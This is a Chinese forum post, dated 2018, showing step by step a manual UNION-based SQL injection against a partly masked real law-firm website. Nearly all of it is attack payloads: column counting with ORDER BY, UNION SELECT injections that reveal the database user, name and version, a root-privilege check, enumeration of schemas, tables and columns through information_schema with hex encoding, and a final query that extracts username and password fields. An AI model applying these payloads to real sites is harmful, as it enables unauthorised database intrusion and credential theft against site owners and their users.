|
|
注:为了网站的安全,对网址做了处理
***目标:http://www.lawxxxxxxx.com.cn
注入页面:http://www.lawxxxxxxx.com.cn/article.php?nid=2377
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15 出错,那么就是14
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
------------------------------------------------
页面出现的数字是8和12
------------------------------------------------
用以下的函数来得到我们想要的
user() 得到连接数据库的用户名 lawyerxxxx@manaxxx.xxxx.com
database() 得到数据库名 lawyerxxxxxx
version() 得到版本 5.1.53-log
用函数来替换12,得到相关的信息
-----------------------------------------------
判断权限
ord(mid(user(),1,1))=114/* 返回错误就不是root权限
--------------------------------------
列出数据库表 需要转编码
unhex(hex(group_concat(schema_name)))
(table_name)))
(column_name)))
例如:
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,unhex(hex(group_concat(schema_name)))
,13,14 from information_schema.schemata 列出数据库 information_schema,lawyerxxxxxx
------------------------------------------
下面的需要转码的 转为hex编码 (用工具转)
-----------------------------------------------------------------------------------
追加列表
from information_schema.schemata 列数据库
from information_schema.tables where table_shema= 列用户
from information_schema.columns where table_name= 列表
例如:
http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(table_name)))
,13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(数据库名)
http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(column_name)))
,13,14 from information_schema.columns where table_name=(表名)
-------------------------------------------
上面的需要转码的转为hex编码
--------------------------------------------------------------------------------
获取用户名:
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,用户字段名,9,10,11,
密码字段名,13,14 from 表名
|
|
QQ群⑧:
窥视卡
雷达卡
发表于 2018-12-22 12:05:30
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡